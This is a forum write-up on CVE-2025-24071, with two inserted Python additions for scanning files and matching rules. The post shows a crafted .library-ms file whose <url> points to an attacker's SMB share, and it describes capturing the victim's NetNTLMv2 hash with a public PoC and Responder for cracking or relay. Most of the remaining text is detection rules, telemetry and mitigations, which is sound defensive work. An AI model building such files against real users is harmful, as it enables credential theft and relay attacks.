Analysis of CVE-2025-24071

Tr0jan_Horse

Moderator
Staff member
MODERATOR
ULTIMATE
PREMIUM
MEMBER
Joined
Oct 23, 2024
Messages
304
Reaction score
8,795
Deposit
0$
1747695604858.png

In this article we will look at the much-discussed CVE-2025-24071, which allows an attacker to obtain the NetNTLMv2 hash of a victim's password as a result of incorrect processing of .library-ms files by Windows Explorer. The vulnerability is already being exploited in the wild, as reported by security researchers. In this short write-up I will show how the vulnerability is exploited, what events it generates, and how such activity can be detected.
What is a .library-ms file

Let's start with what a .library-ms file is. According to the Microsoft documentation, .library-ms files are XML files that define Windows Libraries: special virtual collections of folders and files presented in Explorer.

Files with the .library-ms extension are XML files that:
  1. Store the settings of Windows libraries (for example, "Documents", "Images", "Music").
  2. Contain links to locations (folders, drives, network resources) combined into one logical group.
  3. Use the XML schema described in the Library Schema (MSDN) to define the structure and properties of the library.
  4. Can be created or modified by the user to customize libraries to suit their needs.
The main tags in a .library-ms file:
  • <library> is the root element that contains the description of the library.
  • <name> is the library's display name.
  • <version> is the version of the library schema.
  • <isLibraryPinned> indicates whether the library is pinned in the navigation pane.
  • <iconReference> is the path to the library icon.
  • <templateInfo> defines the type of content (for example, "Documents", "Music").
  • <searchConnectorDescription> contains the search parameters.
  • <simpleLocation>/<url> holds the paths to the included folders.
The last element is extremely important, as it allows the address of a remote resource (for example, the attacker's C2 server) to be specified.
Example of the structure of a .library-ms file:
XML:
<?xml version="1.0" encoding="UTF-8"?>
<library xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>My Documents</name>
  <version>1.0</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1002</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>true</isSupported>
      <simpleLocation>
        <url>%USERPROFILE%\Documents</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</library>

The essence of vulnerability

In fact, attacks on users with .library-ms files were already discussed in an article two years ago. It described how, by specifying the attacker's control server in the file's <url> tag, remote code execution could be achieved through interaction with the attacker's WebDAV share.

On March 18, 2025, the researcher 0x6rss disclosed details of the vulnerability on his blog. He described how, when a file is extracted from a RAR/ZIP archive, Windows Explorer automatically parses it because .library-ms files are trusted. If the <url> tag contains a path to an attacker-controlled SMB share, an automatic NTLM authentication attempt follows, and the victim's NetNTLMv2 hash is captured. As the researchers note, the vulnerability is also triggered when an email attachment is simply saved to the file system. It was also found that authentication to the remote SMB share occurs on any operation involving the .library-ms file, including creating, deleting, or moving it on disk.

An interesting point: the same .library-ms file does not trigger the vulnerability when it is extracted a second time. This is most likely because Windows Explorer only reads the contents of new files that the system has not seen before.
Exploiting the vulnerability

To generate the file, we use the PoC published by the researcher 0x6rss.

As a result, we get a ZIP archive containing the .library-ms file.

An example of the contents of such a file. First, note the <simpleLocation> and <url> tags, which point to our server accepting NTLM authentication attempts. The share, or any other file on the remote resource, does not actually have to exist; it is enough that the host initiates an outgoing SMB connection:

XML:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\10.3.132.57\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
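As an added defensive example (not part of the original post or of the 0x6rss PoC), the Python below parses .library-ms files, accepts both root elements shown on this page, and flags every <url> that points to a remote host, so archives or mail attachments can be screened before Explorer ever touches them. The host name attacker.example and the sample archive are constructed for the demonstration.

```python
"""Flag .library-ms files whose <url> points at a remote host (added example)."""
import io, re, zipfile
import xml.etree.ElementTree as ET

# UNC path (\\host\share...) or a URL scheme the SMB/WebClient stack would follow.
UNC_RE = re.compile(r"^\\\\[^\\]+\\")
URL_RE = re.compile(r"^(?:https?|davs?|smb|file)://", re.IGNORECASE)

def _local(tag):  # strip the namespace: '{http://...}url' -> 'url'
    return tag.rsplit("}", 1)[-1]

def remote_locations(xml_text):
    """Return every <url> value naming a remote host. Accepts both root names seen in
    the article (<libraryDescription>, <library>); %USERPROFILE%-style paths are skipped."""
    root = ET.fromstring(xml_text)
    if _local(root.tag) not in ("libraryDescription", "library"):
        raise ValueError(f"not a library description, root is <{_local(root.tag)}>")
    hits = []
    for el in root.iter():  # any depth, so nesting cannot hide a location
        value = (el.text or "").strip()
        if _local(el.tag) == "url" and (UNC_RE.match(value) or URL_RE.match(value)):
            hits.append(value)
    return hits

def scan_archive(zip_bytes):
    """Map each .library-ms member of a ZIP to its remote <url> values;
    a member that is not a well-formed library is reported, not skipped."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".library-ms"):
                try:
                    findings[info.filename] = remote_locations(zf.read(info))
                except (ET.ParseError, ValueError) as exc:
                    findings[info.filename] = [f"<unparseable: {exc}>"]
    return findings

# Constructed sample (not PoC output): the UNC form from the article, placeholder host.
SAMPLE_LIBRARY_MS = """<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList><searchConnectorDescription>
    <simpleLocation><url>\\\\attacker.example\\shared</url></simpleLocation>
  </searchConnectorDescription></searchConnectorDescriptionList>
</libraryDescription>"""

def sample_zip():
    """Pack the constructed sample into an in-memory ZIP, as an attachment would arrive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("documents.library-ms", SAMPLE_LIBRARY_MS)
    return buf.getvalue()
```

Wiring `scan_archive` into a mail gateway or download hook lets a non-empty result quarantine the archive before extraction, which is the moment the automatic SMB connection would otherwise be triggered.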

The video below shows a replay of the activity: extracting the malicious file from the archive and the subsequent NetNTLMv2 authentication attempt over SMB to the control server.



As the video shows, to exploit the vulnerability it is enough for the victim to unzip the archive containing the malicious file; the system does the rest on its own.

The screenshot below shows the result of Responder's work: we obtained the victim's NetNTLMv2 hash, which can later be cracked offline or used, for example, in relay attacks.

Generated events

Using Procmon, it can be observed that immediately after the .library-ms file is extracted, Explorer.exe and indexing services such as SearchProtocolHost.exe automatically perform the following operations:

  • CreateFile — Explorer opens the file.
  • ReadFile — the contents of the file are read to extract metadata.
  • QueryBasicInformationFile — basic metadata is queried.
  • QueryStandardInformationFile — standard file information is queried.
  • CloseFile — the file is closed after processing.

In addition, SearchProtocolHost.exe is invoked as part of the Windows Search indexing service. After Explorer.exe completes its initial processing, the indexing service reopens and reads the file to index its contents. This further confirms that the file is processed automatically upon extraction.

After SearchProtocolHost.exe has finished processing the file, the connection to the control server can be seen starting.

These actions clearly demonstrate that Windows processes the file automatically, immediately after extraction and without any explicit user interaction. Both Explorer.exe and SearchProtocolHost.exe read and parse the XML contents of the .library-ms file, initiating a connection attempt to the embedded SMB path.

If we talk about Windows OS events that are generated as a result of activity, then we can distinguish the following:

Please note! The rules below are written in Lucene syntax and use the BI.ZONE Data Model.

1. When the file is extracted, we receive a file creation event for a file with the .library-ms extension.
Note here that the proc_file_path field contains the executable that extracted the contents of the archive. In our case this is Windows Explorer, so we can conclude that if no third-party archiver is installed on the victim's system, explorer.exe will be the process that unpacks the archive.

The rule by which such activity can be detected is as follows:
Bash:
dev_os_type:"windows" AND
event_type:(FileCreate OR FileCreateWin OR FileInfo OR FileInfoWin) AND file_name.keyword:/.*\.library-ms

2. After the file is extracted, the following events occur when the host interacts directly with the control server:

  • creation of the process c:\windows\system32\rundll32.exe, which in turn calls the DavSetCookie function from the library C:\Windows\system32\davclnt.dll. No documentation for this function could be found; presumably it sets cookies for a WebDAV session. Note that the function's arguments include the IP address/domain name of the remote resource as well as the full path, including the directory;
  • connection (pipecreate) to the named pipe \\.\pipe\dav rpc service with a similar command line.
The rule by which such activity can be detected is as follows:
Bash:
dev_os_type:"windows" AND
(
    (
        event_type:(ProcessCreate OR ProcessCreateWin OR ProcessInfo OR ProcessInfoWin) AND
        proc_file_path:"\\windows\\system32\\rundll32.exe" AND
        cmdline:("\\Windows\\system32\\davclnt.dll,DavSetCookie")
    ) OR
    (
        event_type:pipeconnect AND
        proc_file_path:"\\windows\\system32\\rundll32.exe" AND
        proc_cmdline:("\\Windows\\system32\\davclnt.dll,DavSetCookie") AND
        pipe_path:"\\\\.\\pipe\\dav rpc service"
    )
)
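As an added example (not part of the original post or of the BI.ZONE rules themselves), the Python below mirrors the two Lucene rules above as plain functions and runs them over constructed sample events, so the matching logic can be checked offline before the rules are deployed. Field names follow the rules; the sample values (the host attacker.example, the file names) are made up.

```python
"""Python equivalent of the article's two Lucene rules, run over sample events (added example)."""
# Field names follow the rules above; the events below are constructed, not real telemetry.
FILE_EVENTS = {"FileCreate", "FileCreateWin", "FileInfo", "FileInfoWin"}
PROC_EVENTS = {"ProcessCreate", "ProcessCreateWin", "ProcessInfo", "ProcessInfoWin"}
RUNDLL32 = r"\windows\system32\rundll32.exe"
DAVSETCOOKIE = r"\windows\system32\davclnt.dll,davsetcookie"
DAV_PIPE = r"\\.\pipe\dav rpc service"

def _norm(value):  # case-insensitive comparison, tolerant of missing fields
    return (value or "").lower()

def rule_library_ms_created(ev):
    """Rule 1: a .library-ms file is created or inspected on a Windows host."""
    return (_norm(ev.get("dev_os_type")) == "windows"
            and ev.get("event_type") in FILE_EVENTS
            and _norm(ev.get("file_name")).endswith(".library-ms"))

def rule_davsetcookie(ev):
    """Rule 2: rundll32 runs davclnt.dll,DavSetCookie, or that process connects to the dav rpc service pipe."""
    if _norm(ev.get("dev_os_type")) != "windows":
        return False
    if not _norm(ev.get("proc_file_path")).endswith(RUNDLL32):
        return False
    if ev.get("event_type") in PROC_EVENTS:
        return DAVSETCOOKIE in _norm(ev.get("cmdline"))
    if ev.get("event_type") == "pipeconnect":
        return (DAVSETCOOKIE in _norm(ev.get("proc_cmdline"))
                and _norm(ev.get("pipe_path")) == DAV_PIPE)
    return False

RULES = (("library-ms file created", rule_library_ms_created),
         ("rundll32 DavSetCookie / dav rpc service pipe", rule_davsetcookie))

def triage(events):
    """Return (rule name, event) for every event matching one of the rules."""
    return [(name, ev) for ev in events for name, rule in RULES if rule(ev)]

# Constructed sample events; attacker.example is a placeholder host.
DAV_CMDLINE = r"C:\Windows\system32\davclnt.dll,DavSetCookie attacker.example \\attacker.example\shared"
SAMPLE_EVENTS = [
    {"dev_os_type": "windows", "event_type": "FileCreate",
     "proc_file_path": r"C:\Windows\explorer.exe", "file_name": "documents.library-ms"},
    {"dev_os_type": "windows", "event_type": "ProcessCreate",
     "proc_file_path": r"C:\Windows\System32\rundll32.exe", "cmdline": DAV_CMDLINE},
    {"dev_os_type": "windows", "event_type": "pipeconnect",
     "proc_file_path": r"C:\Windows\System32\rundll32.exe", "proc_cmdline": DAV_CMDLINE,
     "pipe_path": r"\\.\pipe\dav rpc service"},
    {"dev_os_type": "windows", "event_type": "FileCreate",  # benign: must not match
     "proc_file_path": r"C:\Windows\explorer.exe", "file_name": "report.docx"},
]
```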

Conclusion

In this article I have shown the essence of CVE-2025-24071, the exploitation process, the events generated by the activity, and suggestions for detection. I would note that although, according to Microsoft, the vulnerability is unlikely to become widespread, it may well be heavily used in phishing campaigns because of its applicability to current operating systems and its ease of use.

Monitoring the activity described above with the proposed detection rules will help identify attempts to exploit the vulnerability. Further recommendations:

  • Restrict outgoing SMB connections to external servers to prevent potential attacks.
  • As an additional measure, consider setting the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to Deny All (exceptions can be added where needed).
  • Update the Windows operating system to the latest version, including the March updates, to eliminate known vulnerabilities.
  • Block the opening of files with the .library-ms extension, as they can be used to exploit vulnerabilities.
  • Block receipt of files with the .library-ms extension by email to prevent the spread of malicious objects.